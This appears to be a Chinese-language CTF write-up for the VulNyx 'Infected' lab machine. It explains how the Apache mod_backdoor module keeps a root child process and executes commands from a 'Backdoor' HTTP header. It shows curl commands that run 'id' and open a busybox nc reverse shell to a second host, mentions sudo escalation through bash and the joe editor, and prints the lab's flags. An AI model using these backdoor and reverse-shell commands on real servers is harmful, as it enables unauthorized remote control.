vulnyx Infected writeup

信息收集

arp-scan

nmap

获取userFlag

上web看看

dirb扫一下目录

发现一个info.php页面,去看一下

发现是一个phpinfo页面,那么后续的思路就是在这个phpinfo中找攻击面,这里可以去看一下loaded modules字段,这个字段的作用是显示当前PHP环境中加载了哪些模块,通过该字段我们可以初步的定位一些易受攻击的模块。

在其中发现加载了mod_backdoor模块,这是一个运行在apache2上的后门模块,它的原理是在默认情况下apache是以root权限启动和加载配置项的,当以root权限加载配置项时,BackdoorMod中的恶意代码会运行,就会调用fork()创建一个apache的子进程,这个子进程是apache主进程的一个副本,就相当于是把主进程复制了一份,但是此时这个子进程的权限是root的。而当加载完配置项、加载模块、绑定端口结束后,主进程会降权到运行时用户的权限(如www-data),之后的实际处理请求就都是以www-data用户的权限进行的了。

而主进程降权了,子进程不会降权,即子进程还保留了root权限,此时攻击者仍然可以通过子进程以root权限执行系统命令。所以按我的理解,这个BackdoorMod它其实是用于后渗透阶段权限维持的,而不是用于打点的。

对于mod_backdoor模块,它会检测http请求头中是否存在Backdoor字段,如果存在则会将字段的值作用系统命令执行。所以通过以下方式可以利用这个后门:

bash 复制代码
curl -H "Backdoor: id" http://192.168.43.157

然后就可以反弹shell了,命令如下:

bash 复制代码
curl -H "Backdoor: busybox nc 192.168.43.180 8888 -e /bin/bash" http://192.168.43.157

然后就能拿到一个www-data shell了,sudo -l 看一下

去GTFobins上查利用方案

这里我们可以拿个bash

然后去家目录下就可以拿到userflag了

userflag:6b9d5de6ddf297338e9ce2788198540c

获取rootFlag

继续 sudo -l 看一下

可以以root的身份执行joe命令,通过查看帮助文档发现这个joe是一个文本编辑器,它的功能应该是类似于vi、vim、nano等的,还是去GTFobins上查利用方案

按上述操作就可以拿到root shell了

然后去/root下就可以拿到rootflag了

rootflag:ffb4622f083564d104e0549e201703dc

参考链接

Apache2之隐形后门-腾讯云开发者社区-腾讯云 (tencent.com)

VladRico/apache2_BackdoorMod: A backdoor module for Apache2 (github.com)(BackdoorMod项目地址)

相关推荐
Bug.ink2 分钟前
BUUCTF——WEB(3)
web安全·网络安全·buuctf
Z_renascence2 小时前
web 260-web270
web安全·网络安全
bluechips·zhao4 小时前
中间件及框架漏洞详解(Nginx、Apache、Tomcat、Redis、Zookeeper、RabbitMQ、Kafka等)
nginx·web安全·网络安全·中间件·apache·网络攻击模型·java-rabbitmq
Bruce_Liuxiaowei4 小时前
Python 跨平台 Nmap 自动化扫描工具:从手动到一键批量扫描
开发语言·python·网络安全·自动化
小阿宁的猫猫5 小时前
文件上传和解析漏洞的原理、条件、比赛时的各种绕过方法
web安全·网络安全·web
Whoami!5 小时前
❾⁄₂ ⟦ OSCP ⬖ 研记 ⟧ 防病毒软件规避 ➱ 防病毒软件概述(下)
网络安全·信息安全·防病毒软件
unable code5 小时前
攻防世界-Misc-2-1
网络安全·ctf·misc
weixin_307779135 小时前
基于AWS Shield Advanced的自我管理DNS服务DDoS防护方案
网络安全·云计算·aws
Neolnfra21 小时前
渗透测试标准化流程
开发语言·安全·web安全·http·网络安全·https·系统安全
.昕..1 天前
2025CTF逆向工程“新范式”:当Jadx装上AI大脑,逆向效率提升
网络安全